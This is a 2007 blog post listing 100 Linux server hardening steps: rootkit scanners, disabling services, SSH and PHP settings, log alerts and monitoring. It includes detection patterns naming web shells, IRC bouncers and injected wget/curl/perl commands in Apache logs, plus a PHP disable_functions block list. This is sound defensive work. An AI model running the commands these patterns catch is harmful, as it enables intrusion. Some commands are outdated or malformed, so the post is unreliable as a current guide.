Linux and windows Forum by Anil Raut: December 2007

Monday, December 24, 2007

100 tweaks to secure your server to prevent HACK attempt

How to Secure your Linux Server:

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

You can Optimize host.conf and sysctl.conf
http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root

At command prompt type:

nano -w /etc/log.d/conf/logwatch.conf

You will see this entry:

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Detail = Low

Change that to Medium, or High...

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd ( recommended pure-ftpd as it is more secure one)

9. Rootkit Hunter

rkhunter:

1. Login to your server via SSH as root. Then Type:

[root@server ~]cd /usr/local/src/

Download RKHunter Version 1.1.4

[root@server ~]wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

Extract files

[root@server ~]tar -xzvf rkhunter-1.1.4.tar.gz

[root@server ~]cd rkhunter

[root@server ~]./installer.sh

2. Now setup RKHunter to e-mail you you daily scan reports:

[root@server ~]nano -w /etc/cron.daily/rkhunter.sh

Add The Following:

1. !/bin/bash

(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail above with your e-mail.

It is best to send the e-mail to an e-mail off-site so that

if the box IS compromised the hacker can't erase the scan report unless he hacks another server too

# chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

[root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php for register_globals register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

#!/bin/bash
#uptime alerti script ..
UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
if test $UP -gt 4
then
`uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
fi

89. ignore ping :

1.[root@server ~] iptables -A INPUT -p icmp -j DROP

[root@server ~] echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all

[root@server ~] vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

[root@server ~] find . -type d -perm 777

91.Check for open ports using nmap command.

92. Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type:

[root@server ~] /etc/rc.d/init.d/httpd restart

93.Change ssh ListenAddress /etc/ssh/sshd_config

94.PermitRootLogin no

95.Add root login alert

vi .bash_profile

echo 'ALERT - Root Shell Access on:' `date` `who`
| mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96.Set an SSH Legal Message in /etc/motd

97.Locate.

locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

98.Perform some udp and tcp scan here :

http://www.hackerwatch.org/probe

Also to check if Your Internet connection has no Reverse DNS, this one is also a good URL to check out:

https://www.grc.com/x/ne.dll?bh0bkyd2

99.Check log files at

[root@server ~] tail -f /var/log/secure
[root@server ~] tail -f /var/log/messages
[root@server ~] tail -f /var/log/lastlog ( to check last log)
[root@server ~] tail -f /var/log/security ( logs related to kernel and ICMP/ TCP)

and other log files ( depending on your OS distro) of services running to see if there are any issues.

vmstat

Displays information about memory, cpu and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

Displays the status of all known processes.

lsof

100. Now List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

[root@server ~]chmod -R 700 /etc/rc.d/init.d/*
Use rpm -Va to find out if an rpm is modified
* Apply security patches to vulnerable software (ie. patch -p1 < patch file)
* Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
* Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (lilo and grub both support this)
* Monitor the system (nagios or big brother)

Install AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire.

http://www.cs.tut.fi/~rammer/aide.html

Testing phase when in production:

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured.

Also do a stress test.

[root@server ~] find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

[root@server ~] find /usr/local/apache/domlogs -exec grep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

Note: egrep works for For FreeBSD and for other distro's like CentOS use grep.

: Name: The Great Anil; Location: Nasik, Maharashtra, India

This is Anil..its quite difficult to understand me easily...;) I am a simple and fun loving person, very tech savvy,loves to work anytime anywhere and all the time. Like to work on any distro of Linux with any flavor. Its a Linux fever which inspires me to do the best things in the world of Linux. ..................Linux Kills me !!!

View my complete profile

Blog Design By: BlogSpot Templates

Linux and windows Forum by Anil Raut

Monday, December 24, 2007

100 tweaks to secure your server to prevent HACK attempt

About Me

Previous Posts

Archives